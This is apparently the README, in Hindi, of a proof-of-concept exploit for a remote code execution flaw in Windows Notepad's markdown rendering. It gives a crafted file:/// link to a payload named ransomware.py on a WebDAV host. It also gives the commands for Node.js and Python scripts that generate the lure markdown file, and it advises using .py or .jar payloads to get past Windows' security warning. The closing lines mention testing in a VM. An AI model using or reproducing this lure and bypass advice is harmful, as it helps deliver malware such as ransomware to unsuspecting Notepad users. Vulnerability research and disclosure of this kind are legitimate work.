
Windows Notepad RCE के लिए PoC
"Windows Notepad RCE" भेद्यता का PoC।
"भेद्यता" सरल है। Windows Notepad में मार्कडाउन इंजन अस्पष्ट URL प्रोटोकॉल की परवाह नहीं करता। एक मैलवेयर विश्लेषक के रूप में, मैंने WebDAV- और SMB-आधारित पेलोड तैनाती के बारे में कई रिपोर्टें पढ़ी हैं। इस दस्तावेज़ से, कोई भी file:/// प्रोटोकॉल का दुरुपयोग कर सकता है और एक ऐसा URL बना सकता है जो WebDAV/SMB सर्वर पर किसी फ़ाइल की ओर इंगित करता है।
[BadLink](file:///\\webdav-payload-host@5005\DavWWWRoot\ransomware.py)
मैंने दो स्क्रिप्ट बनाई हैं। एक Node.js में और दूसरी Python में। दोनों एक मार्कडाउन फ़ाइल बनाती हैं जो WebDAV पेलोड की ओर इंगित करती है। आप sample-payloads फ़ोल्डर में दिए गए उदाहरण पेलोड का उपयोग कर सकते हैं।
node poc.js <webdav-server> <port> <payload/path/on/server>
python poc.py <webdav-server> <port> <payload/path/on/server>
आउटपुट (poc.md) वर्तमान निर्देशिका में दिखाई देगा।
अधिकांश पेलोड फ़ाइल एक्सटेंशन (जैसे, .exe, .lnk, .vbs, ...) Notepad ऐप के भेद्य होने के बावजूद एक अंतर्निहित चेतावनी ट्रिगर करेंगे। यह चेतावनी Windows की ओर से ही आती है। कम से कम, मेरे द्वारा परीक्षण की गई हर वह चीज़ जो डिफ़ॉल्ट OOB इंस्टॉलेशन पर कोड निष्पादन की ओर ले जा सकती है, अनिवार्य चेतावनी दिखाती है।

यदि लक्ष्य डिवाइस पर Python या Java स्थापित है, तो आप चेतावनी पॉप-अप को बायपास करने के लिए .py या .jar पेलोड का उपयोग कर सकते हैं।

अब लिंक पर क्लिक करने पर एक नई पॉप-अप चेतावनी दिखाई देती है।
आप Uptodown से Windows Notepad का भेद्य संस्करण पा सकते हैं। इंस्टॉलर के डिजिटल हस्ताक्षर की जाँच करना याद रखें और सुनिश्चित करें कि वह Microsoft का है। साथ ही, आपको इस PoC का परीक्षण केवल VM में ही करना चाहिए।
सुरक्षित रहें और मज़े करें!